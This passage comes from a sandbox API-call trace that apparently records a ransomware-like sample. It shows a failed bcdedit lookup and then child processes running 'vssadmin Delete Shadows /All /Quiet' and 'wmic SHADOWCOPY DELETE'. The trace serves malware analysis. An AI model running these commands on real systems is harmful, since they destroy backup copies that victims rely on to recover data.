(in: Locale=0x409, LCType=0x34, lpLCData=0x4a824cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a824c80, cchData=32 | out: lpLCData="Fri") returned 4 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a824c40, cchData=32 | out: lpLCData="Sat") returned 4 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a824c00, cchData=32 | out: lpLCData="Sun") returned 4 [0077.132] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a824930, cchData=8 | out: lpLCData=".") returned 2 [0077.132] GetLocaleInfoW (in: 
Locale=0x409, LCType=0xf, lpLCData=0x4a824920, cchData=8 | out: lpLCData=",") returned 2 [0077.132] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0077.133] GetProcessHeap () returned 0x680000 [0077.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20c) returned 0x692e80 [0077.133] GetConsoleTitleW (in: lpConsoleTitle=0x692e80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0077.133] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0077.133] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0077.133] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0077.134] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0077.134] GetProcessHeap () returned 0x680000 [0077.134] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x400a) returned 0x696aa8 [0077.134] GetProcessHeap () returned 0x680000 [0077.134] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696aa8 | out: hHeap=0x680000) returned 1 [0077.134] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0077.134] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0077.135] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0077.135] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0077.135] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0077.135] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0077.135] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0077.135] GetProcessHeap () returned 0x680000 [0077.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x58) returned 0x693098 [0077.135] GetProcessHeap () returned 0x680000 [0077.135] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x18) returned 0x6930f8 [0077.136] GetProcessHeap () returned 0x680000 [0077.136] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x6e) returned 
0x693118 [0077.137] GetConsoleTitleW (in: lpConsoleTitle=0x33f620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0077.137] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0077.137] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0077.137] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0077.137] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0077.137] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0077.137] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0077.137] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0077.137] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0077.137] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0077.137] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0077.137] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0077.137] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0077.137] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0077.137] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0077.137] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0077.137] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0077.137] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0077.138] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0077.138] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0077.138] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0077.138] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0077.138] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0077.138] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0077.138] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0077.138] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0077.138] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0077.138] 
_wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0077.138] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0077.138] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0077.138] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0077.138] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0077.138] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0077.138] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0077.138] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0077.138] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0077.138] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0077.138] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0077.138] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0077.138] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0077.138] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0077.138] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0077.138] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0077.138] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0077.138] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0077.138] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0077.138] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0077.138] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0077.138] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0077.138] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0077.139] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0077.139] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0077.139] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0077.139] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0077.139] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0077.139] _wcsicmp 
(_String1="bcdedit", _String2="DATE") returned -2 [0077.139] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0077.139] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0077.139] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0077.139] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0077.139] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0077.139] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0077.139] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0077.139] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0077.139] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0077.139] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0077.139] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0077.139] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0077.139] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0077.139] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0077.139] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0077.139] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0077.139] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0077.139] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0077.139] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0077.139] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0077.139] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0077.139] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0077.139] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0077.139] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0077.139] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0077.139] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0077.139] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0077.139] _wcsicmp 
(_String1="bcdedit", _String2="COLOR") returned -1 [0077.139] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0077.139] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0077.140] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0077.140] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0077.140] GetProcessHeap () returned 0x680000 [0077.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x210) returned 0x693190 [0077.140] GetProcessHeap () returned 0x680000 [0077.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x7e) returned 0x6933a8 [0077.140] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0077.140] GetProcessHeap () returned 0x680000 [0077.140] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x418) returned 0x6807f0 [0077.140] SetErrorMode (uMode=0x0) returned 0x0 [0077.140] SetErrorMode (uMode=0x1) returned 0x0 [0077.140] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6807f8, lpFilePart=0x33f140 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x33f140*="Desktop") returned 0x25 [0077.140] SetErrorMode (uMode=0x0) returned 0x1 [0077.141] GetProcessHeap () returned 0x680000 [0077.141] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6807f0, Size=0x64) returned 0x6807f0 [0077.141] GetProcessHeap () returned 0x680000 [0077.141] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x6807f0) returned 0x64 [0077.141] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0077.141] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0077.141] GetProcessHeap () returned 0x680000 [0077.141] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x120) returned 0x693430 [0077.141] GetProcessHeap () returned 0x680000 [0077.141] RtlAllocateHeap 
(HeapHandle=0x680000, Flags=0x8, Size=0x238) returned 0x680860 [0077.148] GetProcessHeap () returned 0x680000 [0077.148] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x680860, Size=0x122) returned 0x680860 [0077.148] GetProcessHeap () returned 0x680000 [0077.148] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x680860) returned 0x122 [0077.148] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0077.148] GetProcessHeap () returned 0x680000 [0077.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xe0) returned 0x693558 [0077.148] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x693558, Size=0x76) returned 0x693558 [0077.148] GetProcessHeap () returned 0x680000 [0077.148] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x693558) returned 0x76 [0077.148] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.149] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.149] GetLastError () returned 0x2 [0077.149] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.149] GetLastError () returned 0x2 [0077.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.149] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.282] GetLastError () returned 0x2 [0077.282] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, 
lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.283] GetLastError () returned 0x2 [0077.283] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.283] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.283] GetLastError () returned 0x2 [0077.283] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.283] GetLastError () returned 0x2 [0077.283] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.283] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.285] GetLastError () returned 0x2 [0077.285] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.286] GetLastError () returned 0x2 [0077.286] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.286] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.573] GetLastError () returned 0x2 [0077.574] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x33eebc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33eebc) returned 0xffffffff [0077.575] 
GetLastError () returned 0x2 [0077.575] _get_osfhandle (_FileHandle=2) returned 0xb [0077.575] GetFileType (hFile=0xb) returned 0x2 [0077.575] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0077.575] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x33f310 | out: lpMode=0x33f310) returned 1 [0077.576] _get_osfhandle (_FileHandle=2) returned 0xb [0077.576] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x33f344 | out: lpConsoleScreenBufferInfo=0x33f344) returned 1 [0077.576] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a834640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0077.576] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a834640, nSize=0x2000, Arguments=0x33f384 | out: lpBuffer="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0077.576] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a834640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x33f368, lpReserved=0x0 | out: lpBuffer=0x4a834640*, lpNumberOfCharsWritten=0x33f368*=0x62) returned 1 [0077.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.577] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0077.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.577] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0077.577] _get_osfhandle (_FileHandle=0) returned 0x3 [0077.578] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0077.578] SetConsoleInputExeNameW () returned 0x1 [0077.578] GetConsoleOutputCP () returned 0x1b5 [0077.578] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0077.578] SetThreadUILanguage (LangId=0x0) returned 
0x409 [0077.578] exit (_Code=1) Process: id = "14" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x44721000" os_pid = "0x7b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xb40" cmd_line = "vssadmin Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 44 os_tid = 0xc0 Thread: id = 46 os_tid = 0x6f4 Thread: id = 47 os_tid = 0x568 Thread: id = 48 os_tid = 0x114 Thread: id = 49 os_tid = 0xb10 Process: id = "15" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x45a71000" os_pid = "0x208" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xa4c" cmd_line = "wmic SHADOWCOPY DELETE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0x20c [0092.821] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfaf4 | out: lpSystemTimeAsFileTime=0xcfaf4*(dwLowDateTime=0xf849e860, 
dwHighDateTime=0x1d61645)) [0092.821] GetCurrentProcessId () returned 0x208 [0092.821] GetCurrentThreadId () returned 0x20c [0092.821] GetTickCount () returned 0x114bcab [0092.821] QueryPerformanceCounter (in: lpPerformanceCount=0xcfaec | out: lpPerformanceCount=0xcfaec*=21317615898) returned 1 [0092.823] GetModuleHandleA (lpModuleName=0x0) returned 0x9f0000 [0092.823] __set_app_type (_Type=0x1) [0092.823] __p__fmode () returned 0x770331f4 [0092.823] __p__commode () returned 0x770331fc [0092.823] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa2dc15) returned 0x0 [0092.823] __wgetmainargs (in: _Argc=0xa3c5e8, _Argv=0xa3c5f0, _Env=0xa3c5ec, _DoWildCard=0, _StartInfo=0xa3c5fc | out: _Argc=0xa3c5e8, _Argv=0xa3c5f0, _Env=0xa3c5ec) returned 0 [0093.390] ??0CHString@@QAE@XZ () returned 0xa3c28c [0093.390] malloc (_Size=0x18) returned 0x1a13b8 [0093.483] malloc (_Size=0x38) returned 0x1a13d8 [0093.483] malloc (_Size=0x28) returned 0x1a3dc8 [0093.483] malloc (_Size=0x18) returned 0x1a3df8 [0093.483] malloc (_Size=0x24) returned 0x1a3e18 [0093.530] malloc (_Size=0x18) returned 0x1a3e48 [0093.530] malloc (_Size=0x18) returned 0x1a3e68 [0093.530] ??0CHString@@QAE@XZ () returned 0xa3c594 [0093.530] malloc (_Size=0x18) returned 0x1a3e88 [0093.530] ?Empty@CHString@@QAEXXZ () returned 0x74960504 [0093.530] SetConsoleCtrlHandler (HandlerRoutine=0xa26b6f, Add=1) returned 1 [0093.530] _onexit (_Func=0xa32f1f) returned 0xa32f1f [0093.530] _onexit (_Func=0xa32f2e) returned 0xa32f2e [0093.530] _onexit (_Func=0xa32f42) returned 0xa32f42 [0093.531] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0093.531] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0093.532] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0093.782] CoCreateInstance (in: 
rclsid=0x9f6c60*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x9f6b90*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa3c1b0 | out: ppv=0xa3c1b0*=0x2000828) returned 0x0 [0096.464] GetCurrentProcess () returned 0xffffffff [0096.464] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xcf99c | out: TokenHandle=0xcf99c*=0x108) returned 1 [0096.464] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcf998 | out: TokenInformation=0x0, ReturnLength=0xcf998) returned 0 [0096.464] malloc (_Size=0x118) returned 0x1a2788 [0096.464] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x1a2788, TokenInformationLength=0x118, ReturnLength=0xcf998 | out: TokenInformation=0x1a2788, ReturnLength=0xcf998) returned 1 [0096.464] AdjustTokenPrivileges (in: TokenHandle=0x108, DisableAllPrivileges=0, NewState=0x1a2788*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, 
Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0096.464] free (_Block=0x1a2788) [0096.464] CloseHandle (hObject=0x108) returned 1 [0096.465] malloc (_Size=0x40) returned 0x1a2788 [0096.465] malloc (_Size=0x40) returned 0x1a27d0 [0096.465] malloc (_Size=0x40) returned 0x1a2818 [0096.465] malloc (_Size=0x20a) returned 0x1a2860 [0096.465] GetSystemDirectoryW (in: lpBuffer=0x1a2860, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0096.465] free (_Block=0x1a2860) [0096.556] malloc (_Size=0xc) returned 0x1a3fb8 [0096.556] malloc (_Size=0xc) returned 0x1a3fd0 [0096.556] malloc (_Size=0xc) returned 0x1a2860 [0096.556] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0096.556] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0096.557] free (_Block=0x1a3fb8) [0096.557] free (_Block=0x1a3fd0) [0096.557] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x76d30000 [0096.558] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0096.558] SetThreadUILanguage (LangId=0x0) returned 0x409 [0096.559] FreeLibrary (hLibModule=0x76d30000) returned 1 [0096.559] free (_Block=0x1a2860) [0096.559] _vsnwprintf (in: _Buffer=0x1a2818, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xcf8f8 | out: _Buffer="ms_409") returned 6 [0096.559] malloc (_Size=0x20) returned 0x1a3fb8 [0096.559] GetComputerNameW (in: lpBuffer=0x1a3fb8, nSize=0xcf950 | out: lpBuffer="XDUWTFONO", nSize=0xcf950) returned 1 
[0096.560] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.560] malloc (_Size=0x14) returned 0x1a2860 [0096.560] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.560] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xcf98c | out: lpNameBuffer=0x0, nSize=0xcf98c) returned 0x0 [0096.561] GetLastError () returned 0xea [0096.561] malloc (_Size=0x40) returned 0x1a2880 [0096.561] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1a2880, nSize=0xcf98c | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcf98c) returned 0x1 [0096.562] lstrlenW (lpString="") returned 0 [0096.562] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0096.564] lstrlenW (lpString=".") returned 1 [0096.564] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.564] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0096.564] lstrlenW (lpString="LOCALHOST") returned 9 [0096.564] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.564] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0096.564] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.564] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0096.565] free (_Block=0x1a2860) [0096.565] lstrlenW (lpString="XDUWTFONO") returned 